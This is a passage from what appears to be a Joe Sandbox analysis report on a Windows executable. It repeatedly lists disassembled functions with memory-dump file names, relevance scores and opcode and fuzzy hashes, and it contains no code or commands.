                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: fff284297895d5b18f63d5850c4b57f1d66ac3f8440b4199711db5414306fa39
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 5482EFB5A00F448FD365CF29C880B92BBF1BF5A300F548A2ED9EA8B751DB35A545CB50
                                        Function 007F8E78 Relevance: .6, Instructions: 649COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 5ceb0fdf2c1f504077cb4afac8350613ccdd102ef3e1817d1520f91e244e78ce
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 7F42B3706047498FC729CF19C090775FBE2BF99314F288A6EC7868B792D639E885CB51
                                        Function 0082AC28 Relevance: .5, Instructions: 501COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: bcc1512cc2bce2f94f4a1b04582a741e5aa131e7cd98ff75ffb78cbe98f98a16
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: EF02E671E0022A8FDB15CE29D8906AFB7A2FFD9354F16831AE815F7241D770AD8287D0
                                        Function 008098B8 Relevance: .5, Instructions: 482COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 1d2cd25f58df53781bf09f8141d4b3abf5630c5c3e393358b98d905a9991b99f
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: 0E02ED71A093098FDB55CF29C881269BBE1FFA5310F14C72DECD9DB3A2D771A8858A41
                                        Function 00820B88 Relevance: .4, Instructions: 423COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction ID: 037188e0c9008f2acf7a5441686a7dfc5b5ccffca3409f7752350054a93ec0b0
                                        • Opcode Fuzzy Hash: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction Fuzzy Hash: EEE1E371E002298BDF24CF68E9846EEB7B1FF89320F144229E955E73D2D7349985CB91
                                        Function 007F66C8 Relevance: .4, Instructions: 418COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 5eab13d3c8fe0174ad9cfa72905db7f75f455fd52f5b9ae8575878ae570483af
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 4FF16BA250C6954BC71D9A1884F08BD7FD29FA9201F0E86ADFDD70F383D924DA05DBA1
                                        Function 0083B308 Relevance: .4, Instructions: 415COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 4ca0ecaae5c6ccdefa9b9a836e598dd645204b7f2edefc3b2597f45af02ddd01
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 0ED155B3F10A254BEB08CA99DC913ADB6E2EBD8350F19413ED916E7381D6B89D0187D0
                                        Function 0080B8A8 Relevance: .4, Instructions: 376COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 6eac1d35b6f873d3691efee3f15d93f6716b9be7cab17f56444ac31264a9edef
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 6F026B74E006598FCF16CFA8C4905EDBBB6FF8D310F548159E899AB355C730AA91CB50
                                        Function 0080BD68 Relevance: .4, Instructions: 372COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: b46a09acdd752b502630e195cb420d2c96de276fbd40f4a36dbae10978cc06d3
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 1A021675E00A19CFCF15CF98C8809ADB7B6FF88350F258169E809AB355D731A991CF90
                                        Function 0082A648 Relevance: .3, Instructions: 339COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 615b80fd13db6250658117c076993e0ca62dc19c5b3d313da7c55c049c3328f7
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: A9C16A76E29B924BD717873DD802265F394FFE7294F05D72EFCE472982EB2096818204
                                        Function 00818BD9 Relevance: .3, Instructions: 302COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction ID: 9acd0f5d9e215758add863ea6c20fadd470a27e1dadad7569d69c5a36ddfc3ec
                                        • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction Fuzzy Hash: 1DB1F476D05299DFDB21CB64D4523EEBFBAFF52300F198155D444EB282DB3449C68B90
                                        Function 0081AD38 Relevance: .3, Instructions: 302COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: a69bc3288ab8978728569eae6a499259fa116434a7f7b744ae89d7744b4ca5cd
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: 06D11470600B44CFD725CF29C494BA7B7E4FF49304F14896ED89A8BA51DB35E889CB92
                                        Function 0080D720 Relevance: .3, Instructions: 295COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
